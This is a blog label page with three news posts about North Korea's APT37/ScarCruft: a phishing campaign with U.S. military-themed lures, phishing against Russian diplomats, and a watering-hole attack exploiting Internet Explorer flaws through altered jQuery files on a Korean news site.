Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label APT37. Show all posts

TARK#MULE Cyber Attack Campaign Tricking Koreans with U.S. Military-Themed Documents

A relentless cyber attack campaign has been launched, specifically targeting Korean-speaking individuals. The attackers are employing deceptive tactics, using U.S. Military-themed document lures to deceive unsuspecting victims into executing malware on their compromised systems. 

Following the incident, Securonix – a cybersecurity firm – dubbed this sophisticated cyber attack campaign as 'STARK#MULE.' The full extent of the attacks remains undisclosed, leaving uncertainty about the number of victims impacted.  As of now, it remains unclear whether any of the attack attempts have resulted in successful compromises. The situation calls for continued monitoring and vigilance to safeguard potential targets from threats posed by the ongoing campaign. 

According to the report, “these types of attacks are on par with past attacks stemming from typical North Korean groups such as APT37 as South Korea has historically been a primary target of the group, especially its government officials”.  APT37, also known as Nickel Foxcroft, Reaper, Ricochet Chollima, and ScarCruft, is a nation-state actor affiliated with North Korea. Its primary focus lies exclusively on targeting entities within South Korea, particularly those involved in reporting on North Korea and supporting defectors. 

The group has utilized social engineering techniques to initiate phishing attacks, thereby delivering malicious payloads like RokRat onto targeted networks. However, recent developments indicate that adversaries have broadened their offensive capabilities, incorporating various malware families into their tactics. Among the new additions is a Go-based backdoor named AblyGo. 

The campaign exhibits a distinctive strategy, leveraging compromised Korean e-commerce websites for both staging malicious payloads and establishing command-and-control (C2) operations. This clever maneuver aims to evade detection by security solutions installed on targeted systems. 

By utilizing legitimate platforms, the threat actors attempt to fly under the radar and maintain a cloak of stealth during their activities. This innovative approach poses a new challenge for cybersecurity experts in their efforts to protect against evolving threats and reinforces the need for enhanced security measures across digital landscapes. 

As per the information, APT37 has adopted a new tactic, utilizing CHM files in phishing emails to impersonate security communications from financial institutions and insurance companies. The objective is to deceive victims and prompt them to open these malicious files, thereby deploying information-stealing malware and other harmful binaries onto their systems. This observation was made by the AhnLab Security Emergency Response Center (ASEC), shedding light on the threat actor's evolving techniques. 

Using CHM files in disguise poses a significant concern for security teams as they strive to mitigate the risks of cyber-attacks and safeguard sensitive data from sophisticated threat actors. APT37 stands among several North Korean state-sponsored groups that have garnered attention for executing sophisticated cyber attacks aimed at achieving financial theft, as evident from the recent attacks on Alphapo and CoinsPaid. 

Moreover, the group's activities also revolve around gathering intelligence to further the regime's political and national security objectives. This dual focus on financial gains and intelligence acquisition underscores the significance of countering APT37's actions to protect the interests of targeted organizations and safeguard critical national security information from falling into the wrong hands.

North Korean Hackers Attack Russian Diplomats

 

American information security experts from Cluster25 and Black Lotus Labs discovered cyberattacks on employees of the Russian Foreign Ministry before the New Year holidays. They were allegedly carried out by the North Korean hacker group Konni. 

According to Black Lotus Labs, the attackers began a phishing campaign back in October. They sent some diplomats archives with information about vaccination data and sent others links to download a fake program for registering vaccinated people on the federal vaccine registry. As a result, the account of one of the employees of the Foreign Ministry (mshhlystova@mid.ru) was compromised. From this address, hackers sent a phishing email to Deputy Minister Sergei Ryabkov at SRyabkov@mid.ru on December 20. 

In addition, Cluster25 reported that another letter, which contained an infected archive was sent on December 20 to the Russian Embassy in Indonesia, the sender was listed as the diplomatic mission in Serbia. 

The Russian Foreign Ministry confirmed that the attack was real. "However, the attack was timely detected and localized by standard means of active protection of the ministry's information infrastructure and did not spread further," the Foreign Ministry said. The ministry stressed that the phishing attack had no destructive impact on the information infrastructure of the Foreign Ministry. 

As Anastasia Tikhonova, the head of the Group-IB threat research group explained, American experts could take examples of emails from the VirusTotal (VT) service, which analyzes suspicious files. According to her, one of these letters was posted there on the day of the attack, December 20. 

It should be noted that the Konni group (APT37) has been known since 2017. In its attacks, it used, in particular, documents related to Russia-DPRK relations, taking texts from public sources. Kaspersky Lab cybersecurity expert Denis Legezo said that Konni can send a corrupted PDF file. The recipient cannot open it, and attackers under the guise of a reader send him an infected program.

Internet Browser Vulnerabilities Exploited by North Korean Hackers to Implant Malware

 

A threat actor from North Korea has indeed been found exploiting two flaws in the Internet Explorer to attack individuals with a specialized implant, targeting a South Korean online daily newspaper as a component of strategic web compromise (SWC). 

Volexity, a cybersecurity firm, has accredited these attacks and operations to a threat actor recognized by the name InkySquid also better known by the monikers ScarCruft and APT37. It is indeed a widely known North Korean hackers' body. Daily NK — the publication of concern, is believed to have been host to the malevolent code from at least the end of March 2021 to early June 2021. 

InkySquid, the infamous North Korean hacker group has been leveraging the vulnerability since 2020 to upload falsified Javascript code that is usually buried within the genuine code in cyberattacks against an Internet Explorer browser. 

However, according to security researchers, earlier in April this year, Volexity identified a suspicious code loaded via www.dailynk[.]com onto unlawful jquery[.]services subdomains. There are two types of URLs identified, which are listed below:

  • hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1
  • hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 

Further, Volexity experts have noted that the "clever disguise of exploit code amongst legitimate code" as well as the usage of bespoke malware allows attackers to escape detection. 

These attacks involved manipulating the jQuery JavaScript libraries on the website to serve further obscured code from a remote URL and use it to abuse the exploits of two Internet Explorer vulnerabilities that were addressed by Microsoft in August 2020 and March 2021. A Cobalt Strike stagger, as well as the BLUELIGHT new backdoor, have successfully been deployed. 

  • CVE-2020-1380 (CVSS score: 7.5) - Scripting Engine Memory Corruption Vulnerability 
  • CVE-2021-26411 (CVSS score: 8.8) - Internet Explorer Memory Corruption Vulnerability 

It must be mentioned that both the vulnerabilities were actively leveraged in the wild by the North Korean hackers using them to target security scientists working in research and development on vulnerabilities in an operation that was uncovered earlier in January. 

After the timely implementation of the Cobalt Strike, BLUELIGHT is employed as a secondary payload, as a full-featured remote access technique that allows total access to an affected system. 

Along with obtaining system metadata and antivirus product information, malware can execute shellcodes, collect cookies and credentials through Internet Explorer, Microsoft Edge, and Google Chrome browsers, acquire files, and install arbitrary runs that are exfiltrated to a remote server.